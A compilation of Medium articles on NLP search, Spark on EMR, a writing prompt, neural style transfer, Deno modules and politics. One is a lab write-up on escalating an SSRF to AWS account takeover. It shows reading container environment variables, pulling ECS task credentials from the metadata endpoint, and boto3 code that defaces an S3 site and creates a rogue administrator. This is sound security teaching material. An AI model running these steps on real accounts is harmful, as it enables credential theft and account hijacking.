Creative Intelligence: It refers to computers’ ability to create sentences that conform to common sense, semantics, and logic, based on an understanding of semantics. For example, computers can automatically write novels, create music, and chat with people naturally.

The research on NLP covers all of the subjects above. NLP is necessary to realize comprehensive AI.

The Development Trend of NLP

The breakthrough in deep language models will lead to progress in important natural language technologies. NLP services on public clouds will evolve from general functions to customized services. Natural language technologies will be gradually and closely integrated with industries and scenarios to create greater value.
The Capabilities of Alibaba Group’s NLP Platform

From bottom to top, the capabilities of the NLP platform are divided into NLP data, NLP basic capabilities, NLP application technologies, and high-level applications. NLP data is the basis for many algorithms, including language dictionaries, substantive knowledge dictionaries, syntactic dictionaries, and sentiment analysis dictionaries. Basic NLP technologies include lexical analysis, syntactic analysis, text analysis, and deep models. On top of the basic NLP technologies sit vertical NLP technologies, including Q&A and conversation technologies, anti-spam technology, and address resolution. The combination of these technologies supports many applications. Among them, OpenSearch is an application with intensive NLP capabilities.

Applications and Typical NLP Technologies in OpenSearch

The infrastructure of OpenSearch includes Alibaba Cloud’s basic products and exclusive search systems built for the search scenarios of Alibaba Cloud’s ecosystem, such as HA3, RTP, and Dii. The basic management platform handles the collection, management, and training of offline data. The algorithm module is divided into two parts. One is related to query parsing, including multi-grained word segmentation (MWS), entity recognition, error correction, and rewriting. The other is related to relevance and ranking, including text relevance, prediction of Click-Through Rate (CTR) and Conversion Rate (CVR), and Learning to Rank (LTR).

Parts with orange backgrounds are related to NLP

The goal of OpenSearch is to create all-in-one, out-of-the-box intelligent search services. Alibaba Cloud will open these algorithms to users in the form of industry templates, scenarios, and peripheral services.

The Analyzing Procedure of NLP in OpenSearch

A search starts with a keyword. For example, when a user searches “aj1北卡兰新款球鞋” (roughly, “new AJ1 ‘North Carolina’ sneakers”) in Chinese, the analyzing procedure works like this:

Cross-Domain Word Segmentation

Alibaba Cloud has provided a series of open models for cross-domain word segmentation in OpenSearch.

Word Segmentation Challenges

The effect of word segmentation is greatly reduced by unrecognized words — so-called “new words” — in various fields. Customizing a word segmentation model for a new user, from data labeling to model training, is expensive.

Solution

A model for forming terms can be built by combining statistical characteristics, such as mutual information, and left-skewed and right-skewed log transformations. By doing so, a domain dictionary can be quickly built based on user data. By combining word segmentation models from a source domain with dictionaries from a target domain, a tokenizer can be quickly built in the target domain based on remote supervision technology.

The figure above shows the automatic cross-domain word segmentation framework. Users need to provide some corpus data from their business, and Alibaba Cloud can automatically build a customized word segmentation model. This method greatly improves efficiency and meets customers’ needs quickly. This technology offers better results than open-source general-purpose word segmentation models in various domains.

Named Entity Recognition (NER)

NER recognizes important elements. For example, NER can recognize and extract people’s names, places, and times in queries.

Challenges and Difficulties

There is a lot of research on NER in NLP, and many challenges remain.
NER faces difficulties such as boundary ambiguity, semantic ambiguity, and nesting ambiguity, especially in Chinese, due to the lack of native word separators.

Solution

The architecture of the NER model in OpenSearch is shown in the upper-right corner of the following figure. In OpenSearch, many users have accumulated a large number of dictionary object libraries. To make full use of these libraries, Alibaba Cloud built a GraphNER framework that organically integrates this knowledge with the BERT model. As shown in the table in the lower-right corner, this achieves the best NER results in Chinese.

Spelling Correction

The error correction pipeline in OpenSearch includes mining, training, evaluation, and online prediction. The main spelling correction model is based on a statistical translation model and a neural network translation model. The model also comes with a complete set of mechanisms for performance, display style, and manual intervention.

Semantic Matching

The emergence of deep language models has greatly improved many NLP tasks, especially semantic matching. Alibaba DAMO Academy has also proposed many innovations based on BERT and developed the exclusive StructBERT model. The main innovation of StructBERT is that, during the training of the deep language model, it adds more objective functions over word and term order. More diverse objective functions for sentence structure prediction are also added to carry out multi-task learning. However, the universal StructBERT model cannot be handed to different customers in different domains as-is; Alibaba Cloud needs to adapt StructBERT to each domain. Therefore, a three-stage paradigm for semantic matching has been proposed to quickly produce customized semantic matching models for customers. Process details are shown in the figure below:

Services Based on NLP Algorithms

The systematic architecture of services based on these algorithms includes offline computing, online engines, and product consoles. As shown in the figure, the light blue area shows the algorithm-related features provided by NLP in OpenSearch. Users can experience and use these features directly in the console.
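The post doesn’t include code for the statistical new-word discovery mentioned under “Word Segmentation Challenges” above; as a rough, hedged sketch of the mutual-information part only (the toy corpus, tokenisation and ranking are mine), it boils down to comparing how often two adjacent tokens appear together versus independently:

import math
from collections import Counter

corpus = ["open search cloud", "open search engine", "cloud search engine", "open cloud"]
tokenised = [line.split() for line in corpus]

unigrams = Counter(tok for line in tokenised for tok in line)
bigrams = Counter(pair for line in tokenised for pair in zip(line, line[1:]))
total_uni = sum(unigrams.values())
total_bi = sum(bigrams.values())

def pmi(w1, w2):
    # Pointwise mutual information: high values suggest w1+w2 behave like a single term.
    p_joint = bigrams[(w1, w2)] / total_bi
    return math.log(p_joint / ((unigrams[w1] / total_uni) * (unigrams[w2] / total_uni)), 2)

# Rank candidate "new words"; a production system would also use other context statistics.
ranked = sorted(bigrams, key=lambda pair: pmi(*pair), reverse=True)
print([(" ".join(pair), round(pmi(*pair), 2)) for pair in ranked])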
https://medium.com/datadriveninvestor/the-application-of-natural-language-processing-in-opensearch-7b91a899d9bb
['Alibaba Cloud']
2020-12-08 15:36:51.284000+00:00
['Algorithms', 'Big Data', 'Naturallanguageprocessing', 'Artificial Intelligence', 'Alibabacloud']
Apache Spark on Amazon EMR
By Dr Peter Smith, Principal Software Engineer, ACL. I recently had the good fortune of presenting at the Vancouver Amazon Web Services User Group. This monthly event, organized by Onica, is a great opportunity to network with like-minded people in the community, and to discuss AWS-related topics. In my presentation, I provided an introduction to the Apache Spark analytics framework, and gave a quick demo of using Amazon EMR (Elastic Map Reduce) to perform a few basic queries. Here’s a summary of what was discussed. Apache Spark — Unified Analytics Engine Apache Spark has rapidly become a mainstream solution for big data analytics. Numerous organizations take advantage of Spark — processing terabytes of data with the goal of discovering new insights they wouldn’t otherwise have. This includes processing of financial data, analyzing web click streams, and monitoring and reacting to data from IoT sensors. There are many ways to perform analytics with Spark. When Spark is used in a batch-processing environment, input data is placed into cheap storage (such as Amazon S3). At a later time, a Spark cluster reads the data, performs complex analytics (sometimes taking minutes or hours), then writes the final result to the output. In addition to this traditional batch-processing model, Spark also supports machine learning, real-time streaming analytics, and graph-based analytics. What makes Spark so powerful is the ability to divide and conquer. Multiple worker nodes are created, with the analytics computation being distributed amongst them. The following diagram illustrates a Spark cluster with four worker nodes (EC2 instances). Input data is stored in S3 files, and then partitioned and shared amongst the workers. The result of the analytic computation can later be written back to another S3 bucket. In addition to Apache Spark being a well-supported open source framework, with an active user community, AWS makes it trivial to create and manage Spark clusters as part of their EMR (Elastic Map Reduce) offering. More on that later. Spark is Different from a Relational Database Although Spark is often used to analyze tables of “rectangular” data (with rows and columns), and it also supports the familiar SQL language, it would be incorrect to refer to Spark as a relational database. In fact, there are numerous key differences between how Spark manipulates data, versus how the same task is performed in a relational database. To help understand the benefits provided by Spark, let’s discuss these differences. Programming Languages Most relational database systems support the SQL language for querying data. In addition, many of these systems also support the concept of stored procedures, allowing user-defined code to execute inside the database. Although stored procedures provide immense value, they’re written in the database’s specific programming language, and are limited to the run-time environment provided by the database. In the case of Spark, the SQL language is partially supported, but that’s only the starting point. Spark runs on a JVM (Java Virtual Machine) and therefore analytics code can be written in any JVM-based language, such as Java or Scala, providing compatibility with decades of existing code libraries. Additionally, the Python language is fully supported, allowing access to the great libraries and utilities that data scientists know and love. Scalability Relational databases can utilize multiple CPU cores, providing excellent vertical scalability. 
However, many of the advanced features (such as concurrency, locking, and failure recovery) are easier to support if those CPU cores are tightly coupled within a single server host. That is, all the CPUs must share the same memory space and therefore be inside the same physical host. In the case of Spark, support for distributed computation is of primary importance, allowing a Spark cluster to horizontally scale up to much larger data sets (running on 100s or 1000s of hosts). Of course, the distributed (multi-server) nature of Spark means that concurrency, locking, and failure recovery must be handled very differently than with a centralized database. Data Storage Formats Because of the tightly-coupled nature of a relational database, the server has complete control over how data is stored on disk. The operations for querying, inserting, and updating data rows are optimized to use data structures such as B-Trees and WALs. The database user (a human) likely knows nothing about how these data structures work, and will never examine the underlying data files. The complexity of the database is therefore hidden. In a Spark environment, the data formats are fully under the control of users. Data is read from disk in a generic format, such as CSV, JSON, or Parquet, and the final output is written back to disk in a similar user-selected format. Read/Write Versus Read-Only As a result of Spark allowing arbitrary user-chosen disk formats, all reading of input, and writing of output, happens in a user-directed way. Spark doesn’t have control of how data is placed on disk, and therefore isn’t able to insert new data rows, or update individual fields, as you’d often do in a relational database. Instead, Spark reads the data from the input file into main memory (as much as will fit at one time), then performs the analytic computation. Once the final result is complete, the output is fully written back to disk. The key point is that Spark is not suited for transactional operations where small in-place updates are made to existing data. Resilience In a relational database, it’s common to use a master-slave arrangement to recover from failures. The slave server functions in a passive state, simply tracking all the changes made to the master’s data. However, if the master server fails, the slave is promoted to become the new master, with very little downtime. Spark uses a very different approach — rather than having a hot-backup for each of the worker nodes, any failure results in the failed worker’s computation being repeated from the beginning (or the latest checkpoint). More specifically, Spark tracks the data’s lineage, so it knows how to regenerate the computation by replaying the same analytic tasks on a different server. With 1000s of worker nodes, there’s a good chance that one of them will fail and its work must be replayed. Note, however, that it would be significantly more expensive to have 1000 slave nodes acting as hot-backups for the 1000 primary worker nodes! Always-On or On-Demand? Relational databases run on a 24/7 basis. As new data arrives, or existing data is updated, the server is always up-and-running, and available to receive and store the updates. If you have a large database with lots of CPU power and lots of RAM, the infrastructure costs start to add up. In a Spark environment, it’s common to collect data (in CSV or JSON format) and immediately place it into cheap storage (such as Amazon S3).
If nothing else is done with the data at that point in time, there’s no need for Spark workers to be available. All you pay for is the low monthly cost of data in S3. However, when it’s time to perform some analytics (for example, at the end of the month, or the fiscal year), we fire up a large Spark cluster with lots of worker nodes. Only at that time is the data read into the cluster, and the intense computation is performed. Once the work is complete, the Spark cluster is shut down to save the infrastructure cost. A Practical Example As mentioned earlier, Apache Spark is an open source package, freely available for download. However, there’s still plenty of effort required to configure the worker nodes and install the software. Luckily for us, Amazon EMR makes this trivial, allowing creation of a Spark cluster in a matter of minutes. Starting the Cluster
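The cluster-creation demo itself isn’t reproduced in this excerpt; purely as a sketch of one way to do the same step programmatically (the region, release label, instance sizes and S3 script path below are placeholder assumptions, not values from the talk), boto3 can launch a transient Spark cluster with a single submitted step:

import boto3

emr = boto3.client("emr", region_name="us-west-2")  # region is an assumption

response = emr.run_job_flow(
    Name="spark-analytics-demo",
    ReleaseLabel="emr-5.30.0",                 # any Spark-capable EMR release
    Applications=[{"Name": "Spark"}],
    Instances={
        "MasterInstanceType": "m5.xlarge",
        "SlaveInstanceType": "m5.xlarge",
        "InstanceCount": 4,                     # 1 master + 3 workers
        "KeepJobFlowAliveWhenNoSteps": False,   # terminate once the step finishes
    },
    Steps=[{
        "Name": "run-analytics-job",
        "ActionOnFailure": "TERMINATE_CLUSTER",
        "HadoopJarStep": {
            "Jar": "command-runner.jar",
            "Args": ["spark-submit", "--deploy-mode", "cluster",
                     "s3://my-bucket/jobs/analytics.py"],  # placeholder script location
        },
    }],
    JobFlowRole="EMR_EC2_DefaultRole",
    ServiceRole="EMR_DefaultRole",
    VisibleToAllUsers=True,
)
print(response["JobFlowId"])

Because KeepJobFlowAliveWhenNoSteps is false, the cluster shuts itself down once the step completes — the on-demand pattern described above.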
https://medium.com/galvanize/apache-spark-on-amazon-emr-98f04fd346c9
['Peter Smith']
2018-12-17 17:01:00.945000+00:00
['Database', 'Software Development', 'Apache Spark', 'Big Data', 'AWS']
Weekly Pentina Prompt: It’s Artificial
The above images are not real. They are not actual people, works of art, or cats. They are not photographs. There is no copyright or attribution required to use them because a computer made them up on the spot. These images are computer generated on the fly by a form of artificial intelligence known as a Generative Adversarial Network (GAN) which has been trained by lots of actual images to create these inhuman hybrids. If you use it, you will never get the same image as I do and never the same image twice. You might even find some freak occurrences with half-missing glasses, unusually large earlobes, or eyeballs in the wrong places. Don’t believe me? Stop reading this right now and go try it. How long did you spend on there? No matter. Now that you understand robots are going to take over the internet and use it to control our weak minds, it’s time to write a story. So, head back over to thispersondoesnotexist.com and start generating some very real-looking fake images until you find one that inspires a Pentina. At least this week, the picture part of your story is easy. Your prompt is to generate an interesting face (or work of art, or cat) using this mind-boggling tool and write a 50-word story about that image. Be sure to save your image and use it as the featured photo for your Pentina. Just don’t try using an image of a horse — those still need a little work ;-).
https://medium.com/centina-pentina/weekly-pentina-prompt-its-artificial-41396da6a8cc
['J.A. Taylor']
2020-12-18 14:03:24.595000+00:00
['AI', 'Pubprompt', 'Artificial Intelligence', 'Writing Prompts', 'Prompt']
Deep Learning Applications : Neural Style Transfer
One of the most exciting applications of Deep Learning is Neural Style Transfer. Through this article, we will understand Neural Style Transfer and implement our own Neural Style Transfer algorithm using a pre-trained convnet Deep Learning model. Let’s get started and understand what neural style transfer is!

Neural style transfer is an optimization technique used to take two images — a content image and a style reference image (such as an artwork by a famous painter) — and blend them together so the output image looks like the content image, but “painted” in the style of the style reference image.

In neural style transfer terminology, there are 3 images. The image which needs to be painted is known as the Content image. The style in which the content image will be drawn comes from the Style image. And there will be one output image generated by the combination of these two, the content and style images; the technique used here is known as Neural Style Transfer. Neural Style Transfer allows us to generate a new image like the one below by combining the content image and the style image. In other words, we can say that one image (the Content image) is drawn in the style of another image (the Style image) to produce a new image.

Source: LinkedIn

Here we generated the new image on the right by combining the content of the Mona Lisa image on the left and the style image in the middle using the Neural Style Transfer algorithm.

Transfer Learning

Neural Style Transfer (NST) uses a previously trained convolutional network, and builds on top of that. The idea of using a network trained on a different task and applying it to a new task is called transfer learning. Following the original NST paper, we will use the VGG network. Specifically, we’ll use VGG-19, a 19-layer version of the VGG network. This model has already been trained on the very large ImageNet database, and thus has learned to recognize a variety of low-level features (at the shallower layers) and high-level features (at the deeper layers).

Neural Style Transfer

To see how well our algorithm generates the output image from the content image drawn in the style of the style image, we will build the Neural Style Transfer (NST) algorithm in three steps:

Build the content cost function, Jcontent(C,G)

Build the style cost function, Jstyle(S,G)

Put them together to get the total cost function J(G) = α Jcontent(C,G) + β Jstyle(S,G), where α and β are hyperparameters.

Cost Function

We have a content image C and a style image S, and our goal is to generate a new image G. In order to implement neural style transfer, we will define a cost function J(G) that measures how well our algorithm is producing the output image, and we’ll use gradient descent to minimize J(G) in order to get the desired output. This cost function will have two components.

1. The first component is called the content cost. This is a function of the content image and of the generated image, and it measures how similar the content of the generated image is to the content of the content image C.

2. The second component is the style cost, which is a function of S and G, and it measures how similar the style of the image G is to the style of the image S.

The overall cost function is defined as follows:

Here α and β are hyperparameters that specify the relative weighting between the content cost and the style cost.

The algorithm runs as follows:

1. Initialize the generated image G randomly — say 100*100*3 or 500*500*3, or whatever dimensions we want it to be.
2. Use gradient descent to minimize the cost function defined above, updating G as:

Here we are actually updating the pixel values of the image G. As we run gradient descent, we slowly minimize the cost function J(G) through the pixel values, so that we gradually get an image that looks more and more like our content image rendered in the style of our style image.

Computing the content cost (Jcontent(C,G))

Through this content cost function, we will determine how similar the generated image is to the content image. We would like the “generated” image G to have similar content to the input image C. It is advised to choose a layer in the middle of the network — neither too shallow nor too deep — as shallow layers tend to detect lower-level features such as edges and simple textures, and deep layers tend to detect higher-level features such as more complex textures as well as object classes. We will find the activations for both the content image C and the generated image G by setting each image in turn as the input to the pretrained VGG network and running forward propagation. The content cost function is defined as follows:

Here nH, nW and nC are the height, width and number of channels of the hidden layer we have chosen, and appear in a normalization term in the cost. a(C) and a(G) are the 3D volumes corresponding to a hidden layer’s activations.

Computing the style cost (Jstyle(S,G))

First, let’s understand what is meant by style here. Style can be defined as the correlation between activations across different channels in the layer L activations. Before moving on to calculate the style cost, we need to understand one term: the Gram matrix. We also call it the style matrix. In linear algebra, the Gram matrix G of a set of vectors (v1,…,vn) is the matrix of dot products, whose entries are Gij = np.dot(vi, vj). In other words, Gij compares how similar vi is to vj: if they are highly similar, you would expect them to have a large dot product, and thus for Gij to be large.

In Neural Style Transfer (NST), you can compute the Style matrix by multiplying the “unrolled” filter matrix with its transpose. The result is a matrix of dimension (nC,nC), where nC is the number of filters (channels). The value G(gram)i,j measures how similar the activations of filter i are to the activations of filter j.

Now that we understand the Gram matrix and know that the style of an image can be represented using the Gram matrix of a hidden layer’s activations, our goal will be to minimize the distance between the Gram matrix of the “style” image S and the Gram matrix of the “generated” image G. The corresponding style cost for a single layer l is defined as:

G gram(S): Gram matrix of the “style” image.

G gram(G): Gram matrix of the “generated” image.

Remember, this cost is computed using the activations of a single particular hidden layer in the network. We get even better results by combining this representation from multiple different layers. This is in contrast to the content representation, where usually using just a single hidden layer is sufficient. Minimizing the style cost will cause the image G to follow the style of the image S.
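The cost formulas above appear as images in the original post; as a hedged sketch of how they might be written in TensorFlow (the function and variable names are mine, not the author’s), the content cost, the Gram matrix, and the per-layer style cost could look like this:

import tensorflow as tf

def content_cost(a_C, a_G):
    # a_C, a_G: activations of the chosen hidden layer, shape (1, n_H, n_W, n_C)
    _, n_H, n_W, n_C = a_G.shape
    return tf.reduce_sum(tf.square(a_C - a_G)) / (4.0 * n_H * n_W * n_C)

def gram_matrix(A):
    # A: activations unrolled to shape (n_C, n_H * n_W); result has shape (n_C, n_C)
    return tf.matmul(A, tf.transpose(A))

def layer_style_cost(a_S, a_G):
    # a_S, a_G: style / generated activations of one layer, shape (1, n_H, n_W, n_C)
    _, n_H, n_W, n_C = a_G.shape
    a_S = tf.transpose(tf.reshape(a_S, [n_H * n_W, n_C]))
    a_G = tf.transpose(tf.reshape(a_G, [n_H * n_W, n_C]))
    GS, GG = gram_matrix(a_S), gram_matrix(a_G)
    return tf.reduce_sum(tf.square(GS - GG)) / (4.0 * (n_C ** 2) * (n_H * n_W) ** 2)

The total cost from the previous section is then alpha times the content cost plus beta times a weighted sum of layer_style_cost over several chosen layers.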
Optimizing the Total Cost Function

Now that we have defined both the content cost function and the style cost function, our goal will be to optimize the total cost function using gradient descent, so that the generated image keeps the content of the content image but is drawn in the style of the style image.

Implementation

Now that we understand the concepts behind the Neural Style Transfer algorithm, let’s put everything together to implement Neural Style Transfer using the TensorFlow Deep Learning framework and the pretrained VGG-19 model. Here’s what the program does:

1. Create an Interactive Session

2. Load the content image

3. Load the style image

4. Randomly initialize the image to be generated

5. Load the VGG19 model

6. Build the TensorFlow graph

i) Run the content image through the VGG19 model and compute the content cost

ii) Run the style image through the VGG19 model and compute the style cost

iii) Compute the total cost

iv) Define the optimizer and the learning rate

7. Initialize the TensorFlow graph and run it for a large number of iterations, updating the generated image at every step.

Output of the NST Algorithm

In our example, the content image C is a picture of the Louvre Museum in Paris.

Content Image

Following is the style image:

Style Image

And the output image produced by our NST algorithm:

Neural Style Transfer

Note: For the code implementation and better understanding, kindly visit my GitHub repo. I hope this helps! Thanks for reading. Any feedback/suggestions will be highly appreciated.
https://krsanu555.medium.com/deep-learning-applications-neural-style-transfer-6f5bcb9df8d0
['Kumar Sanu']
2020-11-29 18:42:36.828000+00:00
['Convolutional Network', 'Deep Learning', 'AI', 'Computer Vision', 'Neural Style Transfer']
The Left Has a Self-Righteousness Problem
But that fact is misleading — especially since the Democratic Party used to be the party of slavery. Andrew Jackson winning the popular vote in 1824 but losing the election in the House of Representatives was undoubtedly a progressive victory, as Jackson is a president with one of the worst track records on slavery and Native Americans. When Democrat Samuel Tilden defeated Republican Rutherford B. Hayes in the popular vote by more than 200,000 votes, but lost in the Electoral College, the Democrats came to a compromise — they would pull federal troops out of the South and end Reconstruction, but the more progressive Republicans would hold the executive branch. While that sounds like a terrible compromise, think about what might have happened had Tilden won or had Jackson won. It’s tough to think about hypotheticals, but would the country have been a better place if Democrats had won in the 19th century?

Getting rid of the Electoral College requires a constitutional amendment. It requires a two-thirds vote in the Senate and a two-thirds vote in the House. It requires a three-fourths vote of the states. If Trump won 26 out of 50 states, there is no chance Republicans will be on board to overturn an electoral system that favors them any time in the near future. And changing the Electoral College to a popular vote is like changing the sport you’re playing — why would any candidate campaign in rural Ohio or Michigan if the popular vote was all that mattered? If a political candidate wanted to be strategic with their time, why wouldn’t they campaign in New York, Los Angeles, Chicago, Boston, and San Francisco all the time? According to Jacob Levy, a professor at McGill University: “The game will not be any longer to be a [politician who is] liberal but be able to appeal to a rural Ohioan…The game will be: Be a liberal — to the extent I can maximize votes in major urban centers.”

Of course, deceptive branding isn’t the answer either. As the Democratic Party grapples with its identity, the dreaded word of compromise is reality — and ideological purity is the dream. I would love major police reform, universal health care, and not separating children and their parents at the border too. But are we worried about people agreeing with our slogans, or are we worried about actually, strategically passing that legislation?

And the problem now is self-righteousness, because it’s clear that the gap isn’t as racial as it used to be. It’s educational — liberals are simply not connecting as they used to with non-college-educated voters. The media might not have an explicitly liberal bias, but an education bias is shown to tilt liberal. The condescension has gone too far, belittling not only the white working class but the working class of all races. That is shown by the shifting tide of the 2020 election across all demographics. If the Democratic Party still wants to hold onto the claim of being the “party of the people,” then shifting towards being the party of the educated is antithetical to that dream.

The answer we should seek, then, is not to push center or push left, but to do a deep examination of the way we brand and the way we speak. Automatically dismissing and disparaging anyone who disagrees with us makes us feel good about ourselves in our echo chambers, but it’s not winning more voters where it matters. I know a lot of people who agree with me in my city, but those aren’t the opinions that are winning votes where it matters. In the words of Lisa Lerer at the New York Times:
https://medium.com/the-apeiron-blog/the-left-has-a-self-righteousness-problem-1f520c233143
['Ryan Fan']
2020-12-29 21:07:32.199000+00:00
['Politics', 'Race', 'Nonfiction', 'Society', 'Election 2020']
Privilege escalation in the Cloud: From SSRF to Global Account Administrator
In my previous stories, I explored different techniques for exploiting Server-Side Request Forgeries (SSRF), which can lead to unauthorized access to various resources within the internal network of a Web server. In some circumstances, SSRFs can even lead to API keys or database credentials getting compromised. In this story, I wish to show you that in the context of a Cloud application, the consequences of a successful attack that uses this technique are far greater. An attacker that can effectively leverage an SSRF on the right resource could gain complete access to one’s AWS account, and what you can do from there is limited only by your imagination. Spin up a couple of c5.xlarge instances to mine Bitcoin? Host a malware delivery network over S3? Your choice… The DVCA Lab Environment For this experiment, I have developed the DVCA (Damn Vulnerable Cloud Application), which is available on GitHub and has been inspired by the Damn Vulnerable Web Application project. DO NOT deploy this in your environment if you haven’t hardened it by restricting security groups to your own IP and/or changing the IAM Roles given in the project. At the moment of writing, it is made of a static S3-hosted website delivered over SSL by CloudFront. You can choose whether you want a serverless backend using an API Gateway and a Lambda function, an ECS Fargate backend running a Flask container or a Classic EC2 backend running this same container. For the purpose of this article, I will concentrate on the Fargate backend. The Damn Vulnerable Cloud Application architecture From the outside, it all seems fine: HTTPS is active on both the frontend and the backends, and the website is static and therefore protected from classic attacks like SQL Injections or Wordpress plugin vulnerabilities… The DVCA interface The SSRF is done through a Webhook tester, like in my first story about the subject. All backends are coded in such a way that they receive a URL, read it using urllib and return the result to the frontend, which displays it in the “debugger” frame. Roles and Permissions in AWS EC2/ECS In order to assume a role and effectively gain permissions relative to AWS resources, you will need three pieces of information: an AccessKey, a SecretKey, and a SessionToken, in the case that the credentials were issued by the Security Token Service (STS). In an EC2 or ECS infrastructure, each VM/Task can have a particular set of permissions; for example, if your Web application needs to upload files to an S3 Bucket, you will need to assign it the s3:PutObject permission over the bucket. This means that our Fargate containers also need to get credentials from STS in order to do their job, if that job involves calling AWS resources. In a classic EC2 scenario, the credentials for a particular instance can be fetched by the EC2 instance (and only from there, since the endpoint is not public) from the Metadata URL: http://169.254.169.254/latest/meta-data/iam/security-credentials/ . Note that you can also fetch quite a lot of sensitive information from this IP, like UserData scripts that are likely to contain API keys and other secrets. In the case of an ECS Task, the credentials can be retrieved from a different endpoint: http://169.254.170.2/v2/credentials/<SOME_UUID> . The UUID in question can be found in the environment variables of the container, more specifically the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable.
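To make this two-step retrieval concrete, here is a minimal sketch of how an attacker could script it against a vulnerable “webhook tester” backend like DVCA’s. The endpoint path and the url parameter name below are assumptions made purely for illustration and would have to be adapted to the actual target.

import json
import re
import requests

BACKEND = "https://backend.example.com/webhook"  # hypothetical SSRF entry point

def ssrf(url: str) -> str:
    # The vulnerable backend fetches `url` server-side and echoes the body back to us.
    return requests.post(BACKEND, data={"url": url}).text

# Step 1: read the container's environment to find the credentials path.
environ = ssrf("file:///proc/self/environ")
relative_uri = re.search(r"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=([^\x00]+)", environ).group(1)

# Step 2: ask the ECS credentials endpoint for the task's temporary STS credentials.
creds = json.loads(ssrf("http://169.254.170.2" + relative_uri))
print(creds["AccessKeyId"], creds["SecretAccessKey"], creds["Token"])

From there, the AccessKeyId/SecretAccessKey/Token triplet can be fed to boto3 exactly as shown in the next section.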
Abusing the IAM Services through SSRFs Since the STS service is available through normal HTTP endpoints, we can trick the Fargate backend into making arbitrary requests to these endpoints, and the Frontend will happily display the result to us. But how could we find the credentials UUID needed for the request? Well, in my other SSRF story, I showed that you can read a file using the file:// scheme. So assuming the backend is a Linux-based server, you can read the environment variables by pointing your request to file:///proc/self/environ . The relative URL for retrieving the credentials, including the UUID, can be found in /proc/self/environ Yay! Now, we can use this URI to retrieve credentials: Credentials retrieved from an SSRF request Using the credentials In order to use these credentials in a creative manner, I would suggest using boto3 , the Python SDK for interacting with the AWS API. Upon creating the boto3 client object, the constructor accepts credentials as parameters, so we can pass it those received from our SSRF: sts_client = boto3.client( 'sts', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) Now, to be sure that our credentials work and that we have effectively elevated privileges, the STS service has an AWS equivalent to the whoami command: get-caller-identity . Let’s verify: > print(sts_client.get_caller_identity()['Arn']) > arn:aws:sts::0123456789:assumed-role/DVCA-Fargate-Backend-DVCATaskRole-CLOUDFORMATION_ID/SOME_UUID Bingo! Now my laptop is considered by AWS to be the Fargate backend of my application, meaning I have access to everything it has access to. Regarding S3, for example, the backend ECS Task has this set of permissions defined: - Effect: Allow Action: - s3:GetObject - s3:PutObject - s3:ListBucket Resource: '*' # Tip: Try to never wildcard access to resources Now, if the domain name of the DVCA is a “root” domain (that has no subdomain), chances are that the underlying S3 Bucket name is the same as the domain name, because Route53 Alias Records make it just easier to work this way. We can use this to modify the static website and inject a rogue mining script in it (for example), effectively defacing the static S3 website! s3_client = boto3.client( 's3', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) s3_client.put_object(Body=rogue_bytes, Bucket='domain.name', Key='index.html') Also note the s3:ListBucket permission, which also enables the serverless equivalent of directory listing… Taking over Let’s say your Web Application has the right to create roles (a role for each customer, for example) and that, for the sake of simplicity, this permission was implemented as - Effect: Allow Action: - iam:* # Living dangerously Resource: '*' (Very dangerous, but I am sure there are plenty of way-too-permissive implementations of this in the wild).
Using the credentials retrieved through our SSRF technique and passing them to boto3, we are able to create a new Global Administrator user and create Access Keys for it in just a few lines of Python: iam_client = boto3.client( 'iam', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) iam_client.create_user( UserName='DVCA-RogueUser' ) iam_client.attach_user_policy( PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess', UserName='DVCA-RogueUser', ) key_response = iam_client.create_access_key(UserName='DVCA-RogueUser') In this example, the keys will be in the key_response object, which you can just print out. At this point, you have won. You basically own everything in this account. A rogue administrator user created using the backend’s credentials Future work: The Lambda Backend Even though I included a serverless Lambda backend in DVCA, I have not been able to exploit it yet. In this case, the credentials are injected directly into Python's os.environ , but are not part of /proc/self/environ or /proc/self/task/1/environ . I know that they are injected at bootstrap using lambda_runtime.receive_start() , but I am not sure they are anywhere to be found on the filesystem. AWS Lambdas also do not have a metadata endpoint from which we could fetch them. My next hypothesis would be to try to retrieve them from memory, by looking at /proc/self/map* files. So if you have an idea, drop a comment below! Happy hacking! :-)
https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6
['Maxime Leblanc']
2018-09-01 13:01:01.509000+00:00
['Information Security', 'Hacking', 'AWS', 'Cloud Computing', 'Cloudformation']
Using node modules in Deno
Photo by frank mckenna on Unsplash Using node modules in Deno A bad practice but sometimes there is no alternative. Last time we introduced Deno and discussed how it compares to node. Like node, Deno is a server side code-execution environment based on web technology. Node uses JavaScript with commonjs modules and npm/yarn as its package manager. Deno uses Typescript or JavaScript with modern javascript import statements. It does not need a package manager. To import a module in deno you reference it by URL: import { serve } from "https://deno.land/std/http/server.ts"; You can find many of the modules you may need in the Deno standard library or in the Deno third party modules list but they don’t have everything. Sometimes you need to use a module which the maintainers have only made available through the npm ecosystem. Here are some methods from most convenient to least: 1. If the module already uses ES modules import/export syntax. The libraries you use from deno don’t have to come from the recommended Deno packages; they can come from any URL, provided they use the modern import syntax. Using unpkg is a great way to access these files directly from inside an npm repo. import throttle from https://unpkg.com/[email protected]/throttle.js 2. If the module itself doesn’t use imports but the source code does If the module is compiled or in the wrong format through npm you may still have some luck if you take a look at the source code. Many popular libraries have moved away from using commonjs in their source code to the standards-compliant es module import syntax. Some packages have a separate src/ and dist/ directory where the esmodule style code is in src/ which isn’t included in the package available through npm. In that case you can import from the source directly. import throttle from "https://raw.githubusercontent.com/lodash/lodash/master/throttle.js"; I got this URL by clicking on the “raw” button on github to get the raw JS file. It’s probably neater to use a github cdn or to see if the file is available through github pages, but this works. NB: Some libraries use esmodules with webpack, or a module loader which lets them import from node modules like this: Bad: import { someFunction } from "modulename"; import { someOtherFunction } from "modulename/file.js"; The standard for imports is that they need to start with ./ (or ../) or be a full URL to work Good: import { someOtherFunction } from "./folder/file.js"; In that situation try the next method: 3. Importing commonjs modules Fortunately there is a service called JSPM which will resolve the 3rd party modules and compile the commonjs modules to work as esmodule imports. This tool is for using node modules in the browser without a build step. But we can use it here too. The JSPM logo In my most recent project I wanted to do push notifications, which involves generating the credentials for VAPID. There is a deno crypto library which can do encryption, but doing the full procedure is difficult and I’d rather use the popular web-push library. I can import it from the JSPM CDN using a URL like the one below: 